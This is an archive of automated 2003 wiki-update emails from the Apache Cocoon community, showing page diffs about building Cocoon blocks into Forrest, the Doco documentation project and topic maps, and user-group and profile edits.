NEKODTD_HOME=$BASE/../../../nekodtd-$NEKODTD_VERSION + NEKOPULL_VERSION=0.2.3 + NEKOPULL_HOME=$BASE/../../../nekopull-$NEKOPULL_VERSION}}} + + Next we have to tell Forrest what kind of build we are performing.Performing a "real_with_cvs" build copies upgraded jars to their official lib/* locations, and 'cvs + add's them, if you are not a commiter to Forrest you will not be able to CVS add them. If you are a commiter you best be very sure that you actually want to upgrade the version of Cocoon in Forrest's CVS. In most cases you will only want to upgrade your local copy. To do this we want to do a "testing" or "real" build. The problem with "testing" is that the upgrade is only done in your build directory and so each time you rebuild forrest your upgrade will be blown away - consider copying your custom build of Cocoon somewhere safe so you can easily copy it back into place if you rebuild Forrest. You will probably want to use "real", this updates your local official libs so that they will not be blown away when rebuilding Forrest. Uncomment the line you want as follows: + + {{{#UPGRADE_TYPE=testing + UPGRADE_TYPE=real + #UPGRADE_TYPE=real_with_cvs}}} + + Finally we want to tell Forrest what blocks we want, remember you have to have built them in Cocoon first or they won't be there. For example if we want to include the Sessions block we include it like so: + + {{{bzcopy session-fw + #cocoon-session-fw-block.jar}}} + + Importantly for XSP to work in Forrest we must also include\\ + + {{{copy jdtcore + #jdtcore-2.1.0jar}}} + + Next in terminal run ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh'', this can take a while. + + {{{g4% xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh}}} + + Now you are ready to build Forrest: + + {{{g4% xml-forrest/build.sh}}} + + You can now create a Forrest project and seed it and it will now have any of the blocks that you've requested. This method should be able to build any block into Forrest, just make sure that the block you require does not have additional dependencies. + + Lastly to make XSP available to the sitemap, in my-project/sitemap.xmap add the following generator + + {{{<map:generator name="serverpages" pool-grow="2" pool-max="32" pool-min="4" src="org.apache.cocoon.generation.ServerPagesGenerator"/>}}} + + __N.B__: Sometimes Forrest will not build because it loses the forrest.build.xml (''xml-forrest/build.dist/shbat/forrest.build.xml'') If you already have a copy of this save it so you can use it later if needed. Also the same seems to happen sometimes with jing-*.jar (''xml-forrest/lib/core/jing-*.jar''), if this happens you can grab this jar from the Forrest CVS site. + From [email protected] Mon Dec 22 00:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5504 invoked from network); 22 Dec 2003 00:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 00:00:07 -0000 Received: (qmail 29137 invoked by uid 500); 21 Dec 2003 23:59:57 -0000 Delivered-To: [email protected] Received: (qmail 29106 invoked by uid 500); 21 Dec 2003 23:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29094 invoked from network); 21 Dec 2003 23:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 21 Dec 2003 23:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBM003O14575 for <[email protected]>; Mon, 22 Dec 2003 01:00:03 +0100 Date: Mon, 22 Dec 2003 01:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WyonaXopusEditor Mon Dec 22 01:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WyonaXopusEditor , version: 2 on Sun Dec 21 23:47:32 2003 by 161.129.204.104 From [email protected] Mon Dec 22 03:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65439 invoked from network); 22 Dec 2003 03:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 03:00:10 -0000 Received: (qmail 55377 invoked by uid 500); 22 Dec 2003 02:59:57 -0000 Delivered-To: [email protected] Received: (qmail 55352 invoked by uid 500); 22 Dec 2003 02:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55340 invoked from network); 22 Dec 2003 02:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 02:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBM304O14648 for <[email protected]>; Mon, 22 Dec 2003 04:00:05 +0100 Date: Mon, 22 Dec 2003 04:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Mon Dec 22 04:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 10 on Mon Dec 22 03:07:51 2003 by Stefanomazzocchi + + ''A hierarchical structure indicates a unique placing, or, given the ability to create symbolic links, a preferred location for that resource. This also implies that someone (might not be the author of the page, but still a person) must decide where the page resides. This decision is often the most expensive in decisional terms, because its hard to measure the judgment made, especially in environments like open source where there is no figure for an editor. Also, the location of a particular resource in a hierarchy seems to limit the ability to reuse that resource in another context and, potentially, without human intervention... [stefanomazzocchi]'' + + + ''the mod_proxy/mod_cache couple are definately the way to go in a dynamic environment, still, from both a political and community perspective, I think that using static content is the way to go for now. But I do agree with you that in the future a transparent mod_proxy/mod_cache situation with push-based (and IP-filtered to avoid DoS!) cache invalidation mechanism for mod_cache would be extremely beneficial, for Doco and for many other situations, but at a later stage...[stefanomazzocchi]'' From [email protected] Mon Dec 22 04:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79662 invoked from network); 22 Dec 2003 04:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 04:00:10 -0000 Received: (qmail 86477 invoked by uid 500); 22 Dec 2003 03:59:56 -0000 Delivered-To: [email protected] Received: (qmail 86447 invoked by uid 500); 22 Dec 2003 03:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86434 invoked from network); 22 Dec 2003 03:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 03:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBM404O15030 for <[email protected]>; Mon, 22 Dec 2003 05:00:04 +0100 Date: Mon, 22 Dec 2003 05:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Mon Dec 22 05:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 10 on Mon Dec 22 03:07:51 2003 by Stefanomazzocchi + + ''A hierarchical structure indicates a unique placing, or, given the ability to create symbolic links, a preferred location for that resource. This also implies that someone (might not be the author of the page, but still a person) must decide where the page resides. This decision is often the most expensive in decisional terms, because its hard to measure the judgment made, especially in environments like open source where there is no figure for an editor. Also, the location of a particular resource in a hierarchy seems to limit the ability to reuse that resource in another context and, potentially, without human intervention... [stefanomazzocchi]'' + + + ''the mod_proxy/mod_cache couple are definately the way to go in a dynamic environment, still, from both a political and community perspective, I think that using static content is the way to go for now. But I do agree with you that in the future a transparent mod_proxy/mod_cache situation with push-based (and IP-filtered to avoid DoS!) cache invalidation mechanism for mod_cache would be extremely beneficial, for Doco and for many other situations, but at a later stage...[stefanomazzocchi]'' From [email protected] Mon Dec 22 10:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90106 invoked from network); 22 Dec 2003 10:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 10:00:08 -0000 Received: (qmail 88760 invoked by uid 500); 22 Dec 2003 09:59:52 -0000 Delivered-To: [email protected] Received: (qmail 88733 invoked by uid 500); 22 Dec 2003 09:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88722 invoked from network); 22 Dec 2003 09:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 09:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBMA03O15210 for <[email protected]>; Mon, 22 Dec 2003 11:00:04 +0100 Date: Mon, 22 Dec 2003 11:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Mon Dec 22 11:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 13 on Mon Dec 22 09:45:39 2003 by Con - ^ ^ ? - + ^ ^ - | | ? - + | | - | | ? - + | | - v v ? - + v v - Mailclient Browser ? - + Mailclient Browser - committer auditing ? - + committer auditing - (approve/reject, etc.) ? - + (approve/reject, etc.) - [Con]: [TopicMaps|http://www.topicmaps.org/xtm/1.0/#conceptualmodel] are designed precisely for this. + [Con]: [TopicMaps|http://www.topicmaps.org/xtm/1.0/#conceptualmodel] are designed precisely for this. Forrest has a similar idea with a separate map of topics. ? +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + From the [ISO/IEC 13250 spec|http://www.y12.doe.gov/sgml/sc34/document/0129.pdf] (a huge PDF, so I'll quote the entire section on "scope", rather verbosely): - From the [ISO/IEC 13250 spec (pdf)|http://www.y12.doe.gov/sgml/sc34/document/0129.pdf]: - ''A TopicMap defines a multidimensional topic space - a space in which the locations are topics, and in which the distances between topics are measurable in terms of the number of intervening topics which must be visited in order to get from one topic to another, and the kinds of relationships that define the path from one topic to another, if any, through the intervening topics, if any.'' + ''Topic maps enable multiple, concurrent views of sets of information objects. The structural nature + of these views is unconstrained; they may reflect an object oriented approach, or they may be + relational, hierarchical, ordered, unordered, or any combination of the foregoing. Moreover, an + unlimited number of topic maps may be overlaid on a given set of information resources. + Topic maps can be used: + * To qualify the content and/or data contained in information objects as topics to enable navigational tools such as indexes, cross-references, citation systems, or glossaries. + * To link topics together in such a way as to enable navigation between them. This capability can be used for virtual document assembly, and for creating thesaurus-like interfaces to corpora, knowledge bases, etc. + * To filter an information set to create views adapted to specific users or purposes. For example, such filtering can aid in the management of multilingual documents, management of access modes depending on security criteria, delivery of partial views depending on user profiles and/or knowledge domains, etc. + * To structure unstructured information objects, or to facilitate the creation of topic-oriented user interfaces that provide the effect of merging unstructured information bases with structured ones. The overlay mechanism of topic maps can be considered as a kind of external markup mechanism, in the sense that an arbitrary structure is imposed on the information without altering its original form.'' + - There are some [Cocoon components for dealing with TopicMaps|http://tm4j.org/cocoon-integration.html] already (part of the tm4web project at SourceForge). + There are some [Cocoon components for dealing with TopicMaps|http://tm4j.org/cocoon-integration.html] already (part of the tm4web project at SourceForge). ? + From [email protected] Mon Dec 22 13:00:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79446 invoked from network); 22 Dec 2003 13:00:05 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 13:00:05 -0000 Received: (qmail 59910 invoked by uid 500); 22 Dec 2003 13:00:03 -0000 Delivered-To: [email protected] Received: (qmail 59874 invoked by uid 500); 22 Dec 2003 13:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59857 invoked from network); 22 Dec 2003 13:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 13:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBMD02O15304 for <[email protected]>; Mon, 22 Dec 2003 14:00:02 +0100 Date: Mon, 22 Dec 2003 14:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupHolland Mon Dec 22 14:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupHolland , version: 18 on Mon Dec 22 12:48:22 2003 by ArjeCahn + * Gertjan Idema From [email protected] Mon Dec 22 14:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9933 invoked from network); 22 Dec 2003 14:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 14:00:13 -0000 Received: (qmail 30846 invoked by uid 500); 22 Dec 2003 14:00:03 -0000 Delivered-To: [email protected] Received: (qmail 30802 invoked by uid 500); 22 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30676 invoked from network); 22 Dec 2003 14:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 14:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBME02O15342 for <[email protected]>; Mon, 22 Dec 2003 15:00:02 +0100 Date: Mon, 22 Dec 2003 15:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CarstenZiegeler Mon Dec 22 15:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CarstenZiegeler , version: 4 on Mon Dec 22 13:17:34 2003 by 161.129.204.104 - I try to follow all those great open source software projects as much as I can. Currently I have the privileges to be the release manager of Apache Cocoon and to be one of the newly created PMC members of Avalon. ? --------------------------------------------------------- + I try to follow all those great open source software projects as much as I can. Currently I have the privileges to be the release manager of Apache Cocoon. From [email protected] Mon Dec 22 15:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44848 invoked from network); 22 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 15:00:07 -0000 Received: (qmail 68996 invoked by uid 500); 22 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 68864 invoked by uid 500); 22 Dec 2003 15:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68845 invoked from network); 22 Dec 2003 15:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 15:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBMF02O15379 for <[email protected]>; Mon, 22 Dec 2003 16:00:02 +0100 Date: Mon, 22 Dec 2003 16:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupWashingtonDC Mon Dec 22 16:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupWashingtonDC , version: 5 on Mon Dec 22 14:57:47 2003 by 161.129.204.104 - * [Berin Loritsch|Berin] ? - ------- + * Berin Loritsch From [email protected] Mon Dec 22 16:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73775 invoked from network); 22 Dec 2003 16:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Dec 2003 16:00:09 -0000 Received: (qmail 4727 invoked by uid 500); 22 Dec 2003 16:00:03 -0000 Delivered-To: [email protected] Received: (qmail 4586 invoked by uid 500); 22 Dec 2003 16:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4571 invoked from network); 22 Dec 2003 16:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 22 Dec 2003 16:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBMG03O15413 for <[email protected]>; Mon, 22 Dec 2003 17:00:04 +0100 Date: Mon, 22 Dec 2003 17:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Main About Mon Dec 22 17:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 314 on Mon Dec 22 15:26:52 2003 by 161.129.204.104 - ** You want to share Cocoon experiences face to face or simply meet other people working with Cocoon in your area?\\ Have a look into the new [Cocoon Ussssssssssser Groups section|UserGroups]! ? ---------- + ** You want to share Cocoon experiences face to face or simply meet other people working with Cocoon in your area?\\ Have a look into the new [Cocoon User Groups section|UserGroups]! Page: http://wiki.cocoondev.org/Wiki.jsp?page=About , version: 34 on Mon Dec 22 15:23:37 2003 by 161.129.204.104 - !Introduction. ? - + !Introduction From [email protected] Tue Dec 23 05:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65335 invoked from network); 23 Dec 2003 05:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 05:00:16 -0000 Received: (qmail 87075 invoked by uid 500); 23 Dec 2003 04:59:56 -0000 Delivered-To: [email protected] Received: (qmail 87048 invoked by uid 500); 23 Dec 2003 04:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87028 invoked from network); 23 Dec 2003 04:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 04:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBN504O16081 for <[email protected]>; Tue, 23 Dec 2003 06:00:05 +0100 Date: Tue, 23 Dec 2003 06:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Apples Tue Dec 23 06:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Apples , version: 4 on Tue Dec 23 04:44:05 2003 by 161.129.204.104 + ---- - ---- Horizontal ruler - \\ Forced line break - [link] Create hyperlink to "link", where "link" can be either an internal - WikiName or an external link (http://) - [text|link] Create a hyperlink where the link text is different from the actual - hyperlink link. - [text|wiki:link] Create a hyperlink where the link text is different from the - actual hyperlink link, and the hyperlink points to a named Wiki. - This supports interWiki linking. - * Make a bulleted list (must be in first column). Use more (**) - for deeper indentations. - # Make a numbered list (must be in first column). Use more (##, ###) - for deeper indentations. - - !, !!, !!! Start a line with an exclamation mark (!) to make a heading. - More exclamation marks mean bigger headings. - - __text__ Makes text bold. - ''text'' Makes text in italics (notice that these are single quotes (')) - {{text}} Makes text in monospaced font. - ;term;def Defines 'term' with 'def'. Use this with empty 'term' to make short comments. - - |text|more text| Makes a table. Double bars for a table heading. - From [email protected] Tue Dec 23 08:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13770 invoked from network); 23 Dec 2003 08:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 08:00:17 -0000 Received: (qmail 88696 invoked by uid 500); 23 Dec 2003 07:59:53 -0000 Delivered-To: [email protected] Received: (qmail 88663 invoked by uid 500); 23 Dec 2003 07:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88652 invoked from network); 23 Dec 2003 07:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 07:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBN803O16166 for <[email protected]>; Tue, 23 Dec 2003 09:00:04 +0100 Date: Tue, 23 Dec 2003 09:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JohnWebber People Tue Dec 23 09:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JohnWebber , version: 5 on Tue Dec 23 08:07:15 2003 by 161.129.204.104 - Java Programmer and Cocoon user. Software developer at [Jentro Technologies GmbH|http://www.jentro.com] in Munich. Formerly opera conductor and pianist (well, I still play the piano). [Homepage|http://www.secweb.de]. Also a member of the Munich [Pianistenclub e.V.|http://www.pianistenclub.de]. ? ^^ ^^^^^ + Java developer and (new) Cocoon user. Software developer at [Jentro Technologies GmbH|http://www.jentro.com] in Munich. Formerly opera conductor and pianist (well, I still play the piano). [Homepage|http://www.secweb.de]. Also a member of the Munich [Pianistenclub e.V.|http://www.pianistenclub.de]. ? ^^^^^ ^ ++++++ + I started a [CocoonUserGroupMunich] page, but no one else has joined yet. Anyone else there? Wo seid ihr alle? + Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 225 on Tue Dec 23 08:05:16 2003 by 161.129.204.104 + * [John Webber] -- Java and (new) Cocoon developer from Seattle, living/working in Munich. From [email protected] Tue Dec 23 09:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53934 invoked from network); 23 Dec 2003 09:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 09:00:17 -0000 Received: (qmail 28329 invoked by uid 500); 23 Dec 2003 08:59:53 -0000 Delivered-To: [email protected] Received: (qmail 28185 invoked by uid 500); 23 Dec 2003 08:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28170 invoked from network); 23 Dec 2003 08:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 08:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBN903O16199 for <[email protected]>; Tue, 23 Dec 2003 10:00:04 +0100 Date: Tue, 23 Dec 2003 10:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] JohnWebber People Tue Dec 23 10:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=JohnWebber , version: 5 on Tue Dec 23 08:07:15 2003 by 161.129.204.104 - Java Programmer and Cocoon user. Software developer at [Jentro Technologies GmbH|http://www.jentro.com] in Munich. Formerly opera conductor and pianist (well, I still play the piano). [Homepage|http://www.secweb.de]. Also a member of the Munich [Pianistenclub e.V.|http://www.pianistenclub.de]. ? ^^ ^^^^^ + Java developer and (new) Cocoon user. Software developer at [Jentro Technologies GmbH|http://www.jentro.com] in Munich. Formerly opera conductor and pianist (well, I still play the piano). [Homepage|http://www.secweb.de]. Also a member of the Munich [Pianistenclub e.V.|http://www.pianistenclub.de]. ? ^^^^^ ^ ++++++ + I started a [CocoonUserGroupMunich] page, but no one else has joined yet. Anyone else there? Wo seid ihr alle? + Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 225 on Tue Dec 23 08:05:16 2003 by 161.129.204.104 + * [John Webber] -- Java and (new) Cocoon developer from Seattle, living/working in Munich. From [email protected] Tue Dec 23 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65631 invoked from network); 23 Dec 2003 14:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 14:00:07 -0000 Received: (qmail 54723 invoked by uid 500); 23 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 54698 invoked by uid 500); 23 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54686 invoked from network); 23 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNE03O16365 for <[email protected]>; Tue, 23 Dec 2003 15:00:03 +0100 Date: Tue, 23 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupHolland People Tue Dec 23 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupHolland , version: 20 on Tue Dec 23 14:09:25 2003 by ArjeCahn + * When? * - Second week of december? Please add your name and the days you prefer! - I (Arje) would like to invite you to come to Amsterdam for the first Borrel. Will think of an exact location. - * Arje (8, 9, 10, 11, 12, 13, 14 december) - * Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 226 on Tue Dec 23 13:13:06 2003 by RomanHrivik + * [Roman Hrivik|RomanHrivik] -- Java developer from Slovakia From [email protected] Tue Dec 23 15:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96801 invoked from network); 23 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 15:00:07 -0000 Received: (qmail 41848 invoked by uid 500); 23 Dec 2003 15:00:02 -0000 Delivered-To: [email protected] Received: (qmail 41807 invoked by uid 500); 23 Dec 2003 15:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41791 invoked from network); 23 Dec 2003 15:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 15:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNF02O16398 for <[email protected]>; Tue, 23 Dec 2003 16:00:02 +0100 Date: Tue, 23 Dec 2003 16:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupHolland Tue Dec 23 16:00:02 